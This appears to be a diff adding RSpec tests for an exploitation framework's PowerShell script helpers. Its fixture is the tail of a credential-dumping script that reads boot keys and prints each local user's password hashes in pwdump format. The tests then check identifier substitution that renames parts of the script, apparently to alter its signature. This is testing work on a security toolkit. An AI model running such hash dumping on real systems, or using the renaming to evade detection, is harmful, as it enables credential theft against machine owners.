+    LoadApi
+    $bootkey = Get-BootKey;
+    $hbootKey = Get-HBootKey $bootkey;
+    Get-UserKeys | %{
+        $hashes = Get-UserHashes $_ $hBootKey;
+        \"{0}:{1}:{2}:{3}:::\" -f ($_.UserName,$_.Rid,
+            [BitConverter]::ToString($hashes[0]).Replace(\"-\",\"\").ToLower(),
+            [BitConverter]::ToString($hashes[1]).Replace(\"-\",\"\").ToLower());
+    }
+}
+DumpHashes"""
+  end
+
+  describe "::read_script" do
+    it 'should create a script from a string input' do
+      script = described_class.read_script(example_script)
+      script.should be_a_kind_of Rex::Exploitation::Powershell::Script
+    end
+  end
+
+  describe "::process_subs" do
+    it 'should create an array of substitutions to process' do
+      subs = described_class.process_subs("BitConverter,ParpConverter;$bootkey,$parpkey;")
+      subs.should eq [['BitConverter','ParpConverter'],['$bootkey','$parpkey']]
+    end
+  end
+
+  describe "::make_subs" do
+    it 'should substitute values in script' do
+      script = described_class.make_subs(example_script,[['BitConverter','ParpConverter']])
+      script.include?('BitConverter').should be_false
+      script.include?('ParpConverter').should be_true
+    end
+  end
+
+end
+